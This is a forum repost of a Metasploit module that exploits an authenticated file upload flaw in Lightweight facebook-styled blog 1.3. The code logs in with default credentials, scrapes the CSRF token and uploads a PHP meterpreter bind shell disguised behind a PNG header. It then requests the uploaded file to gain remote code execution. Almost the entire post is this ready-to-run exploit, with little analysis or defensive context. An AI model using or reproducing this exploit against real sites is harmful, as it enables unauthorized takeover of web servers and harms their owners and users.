Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)

 Share


HACK1949

Recommended Posts

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Lightweight facebook-styled blog authenticated remote code execution",
      'Description'    => %q{
        This module exploits the file upload vulnerability of Lightweight self-hosted facebook-styled PHP blog and allows remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Maide Ilkay Aydogdu <ilkay@prodaft.com>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
      'DefaultOptions'  =>
        {
          'SSL' => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['php'],
      'Arch'           => [ ARCH_PHP],
      'Targets'        =>
        [
          ['PHP payload',
            {
              'Platform' => 'PHP',
              'Arch' => ARCH_PHP,
              'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 19 2018",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('USERNAME', [true, 'Blog username', 'demo']),
        OptString.new('PASSWORD', [true, 'Blog password', 'demo']),
        OptString.new('TARGETURI', [true, 'The URI of the arkei gate', '/'])
      ]
    )
  end



  def login

    res = send_request_cgi(
      'method'    => 'GET',
      'uri'       => normalize_uri(target_uri.path),
    )


    cookie = res.get_cookies
    token = res.body.split('":"')[1].split('"')[0]
    # token = res.to_s.scan(/"[abcdef0-9]{10}"}/)[0].to_s.tr('"}', '')
    print_status("Got CSRF token: #{token}")
    print_status('Logging into the blog...')
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'ajax.php'),
      'headers' => {
        'Csrf-Token' => token,
      },
      'cookie' => cookie,
      'data'      => "action=login&nick=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}",
    )

    if res && res.code == 200
      print_good("Successfully logged in with #{datastore['USERNAME']}")
      json = res.get_json_document
      if json.empty? && json['error']
        print_error('Login failed!')
        return nil, nil
      end
    else
      print_error("Login failed! Status code #{res.code}")
      return nil, nil
    end

    return cookie, token
  end


  def exploit
    cookie, token = login
    unless cookie || token
      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed")
    end

    data = Rex::MIME::Message.new # jWPU1tZmoAZgooopowaNGjRq0KhBowaNGjRqEHYAALgBALdg7lyPAAAAAElFTkSuQmCC
    png = Base64.decode64('iVBORw0KGgoAAAANSUhEUgAAABgAAAAbCAIAAADpgdgBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAJElEQVQ4') # only the PNG header
    data.add_part(png+payload.encoded, 'image/png', 'binary', "form-data; name=\"file\"; filename=\"mia.php\"")
    print_status('Uploading shell...')
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path,'ajax.php'),
      'cookie' => cookie,
      'vars_get' => {
        'action' => 'upload_image'
      },
      'headers' => {
        'Csrf-Token' => token,
      },
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => data.to_s,
    )

    # print_status(res.to_s)
    if res && res.code == 200
      json = res.get_json_document
      if json.empty? || !json['path']
        fail_with(Failure::UnexpectedReply, 'Unexpected json response')
      end

      print_good("Shell uploaded as #{json['path']}")
    else
      print_error("Server responded with code #{res.code}")
      print_error("Failed to upload shell")
      return false
    end

    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, json['path'])}, 3
    )
    print_good("Payload successfully triggered !")
  end
end
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...